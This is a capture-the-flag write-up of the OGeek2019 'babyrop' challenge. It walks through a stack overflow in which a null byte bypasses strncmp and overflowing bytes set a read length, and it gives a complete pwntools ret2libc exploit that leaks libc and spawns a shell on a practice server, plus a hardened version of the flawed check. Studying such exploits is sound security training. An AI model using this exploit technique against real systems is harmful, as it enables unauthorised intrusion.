[OGeek2019]babyrop
2022-06-24 07:23:00 [mzq]

checksec: a 32-bit program; the other items are not a serious problem.
main function

```c
int __cdecl main()
{
  int buf; // [esp+4h] [ebp-14h]
  char v2; // [esp+Bh] [ebp-Dh]
  int fd; // [esp+Ch] [ebp-Ch]

  f1();
  fd = open("/dev/urandom", 0);   // open the random-number source
  if ( fd > 0 )                   // only read if open succeeded
    read(fd, &buf, 4u);           // read 4 random bytes from fd into buf
  v2 = f2(buf);                   // v2 is f2's return value
  f3(v2);
  return 0;
}
```
f1 function: initialization; it only clears the buffer, nothing to say.

f2 function
f2 uses read to take in 0x20 bytes, but buf is only 8 bytes in size; however buf is 0x2c away from ebp, so this overflow is far from reaching the return address. But f2 returns the value v5 to f3 as a parameter, and strncmp can be bypassed with \x00; in f3, as long as v5 is not equal to 127, an overflow of any length can be completed.

```c
int __cdecl sub_804871F(int a1)
{
  size_t v1; // eax
  char s; // [esp+Ch] [ebp-4Ch]
  char buf[7]; // [esp+2Ch] [ebp-2Ch]
  unsigned __int8 v5; // [esp+33h] [ebp-25h]
  ssize_t v6; // [esp+4Ch] [ebp-Ch]

  memset(&s, 0, 0x20u);
  memset(buf, 0, 0x20u);
  sprintf(&s, "%ld", a1);         // write a1 into s as a decimal string
  v6 = read(0, buf, 0x20u);       // read up to 0x20 bytes from stdin into buf
  buf[v6 - 1] = 0;                // strip the trailing newline
  v1 = strlen(buf);               // length of the input
  if ( strncmp(buf, &s, v1) )     // compare only v1 = strlen(buf) characters
    exit(0);
  write(1, "Correct\n", 8u);
  return v5;                      // v5 is never assigned in this function
}
```
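As an added illustration that is not part of the original writeup, the C below models the two defects described in the f2 analysis (the strncmp length taken from the input itself, and v5 sitting at buf[7], so the read overwrites it) next to a fixed version of the same check. The struct layout, the names f2_vuln/f2_fixed, the secret string "1234567890" standing in for sprintf("%ld", a1) and the sample inputs are constructed assumptions, not the binary's code.

```c
#include <string.h>

/* Constructed model of f2's frame, not the binary's real stack. The decompiled
 * offsets (buf at ebp-0x2c, v5 at ebp-0x25) place v5 exactly at buf[7]; the
 * struct below reproduces that adjacency deterministically. */
struct frame {
    char buf[7];
    unsigned char v5;     /* never assigned by f2: its "return value" is stale */
    char rest[0x20 - 8];  /* keeps the 0x20-byte read inside the model */
};

/* The decompiled check, modelled as the binary behaves. input/len stand in for
 * the bytes read(0, buf, 0x20u) would return. Returns v5, or -1 where the
 * binary would exit(0). */
int f2_vuln(const char *s, const char *input, size_t len)
{
    struct frame fr;
    memset(&fr, 0, sizeof fr);
    if (len == 0 || len > 0x20) return -1;
    char *buf = (char *)&fr;           /* the frame as read() sees it */
    memcpy(buf, input, len);           /* bytes 7.. land in v5 and beyond */
    buf[len - 1] = 0;                  /* buf[v6 - 1] = 0: drop the newline */
    size_t v1 = strlen(buf);           /* a leading '\0' makes v1 == 0 ... */
    if (strncmp(buf, s, v1) != 0)      /* ... and strncmp(_, _, 0) is always 0 */
        return -1;
    return fr.v5;                      /* whatever the copy left at buf[7] */
}

/* Hardened version: bounded copy, full-length comparison, explicit status. */
int f2_fixed(const char *s, const char *input, size_t len)
{
    char buf[0x21];
    if (len == 0 || len > sizeof buf - 1) return 0;
    memcpy(buf, input, len);
    buf[len] = 0;
    if (buf[len - 1] == '\n') buf[len - 1] = 0;
    /* compare the whole string: an empty or short prefix can no longer match */
    if (strlen(buf) != strlen(s) || memcmp(buf, s, strlen(s)) != 0) return 0;
    return 1;
}
```

Even a correct guess leaks into v5 in the vulnerable version: "1234567890\n" passes the check but returns '8', which is why f3's read length is attacker-chosen in every case.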
f3 function
We can see that the key exploitation point is in f3: in the else branch, read reads in a1 bytes, and a1 is f2's return value v5. In f2 we can overflow to control the value of v5, and with that the rop chain is constructed.
```c
ssize_t __cdecl sub_80487D0(char a1)
{
  ssize_t result; // eax
  char buf; // [esp+11h] [ebp-E7h]

  if ( a1 == 127 )                // if a1 == 127, read 0xc8 bytes
    result = read(0, &buf, 0xC8u);
  else                            // otherwise read a1 bytes
    result = read(0, &buf, a1);
  return result;
}
```
exp
```python
from pwn import *

# io = process("./pwn")            # local test; the remote line below replaces it
io = remote("node4.buuoj.cn", 26505)
elf = ELF("./pwn")
libc = ELF("libc-2.23.so")
context(log_level="debug", arch="i386")

write_plt = elf.plt["write"]
read_got = elf.got["read"]
main_func = 0x08048825

# Round 1: a leading \x00 makes strlen(buf) == 0, so strncmp compares nothing;
# the following 0xff bytes land on v5 (buf[7]), so f3 reads 0xff bytes.
payload1 = b"\x00" + b"\xff" * 7
io.sendline(payload1)
io.recvline()                       # "Correct\n"

# Round 2: fill f3's buf up to ebp (0xe7 bytes) plus the saved ebp, return to
# write(1, read@got, 8) to leak the libc address of read, then back to main.
payload2 = flat([b"a" * 0xE7, b"b" * 4, write_plt, main_func, 1, read_got, 0x8])
io.sendline(payload2)
read_addr = u32(io.recv(4))
print(read_addr)

libcbase = read_addr - libc.symbols["read"]
# print(libcbase)
system_addr = libcbase + libc.symbols["system"]
binsh = libcbase + next(libc.search(b"/bin/sh"))
print(binsh)

# Round 3: repeat the f2 bypass, then return to system("/bin/sh").
payload3 = flat([b"a" * 0xE7, b"b" * 4, system_addr, 0, binsh])
io.sendline(payload1)
io.recvline()
io.sendline(payload3)
io.interactive()
```
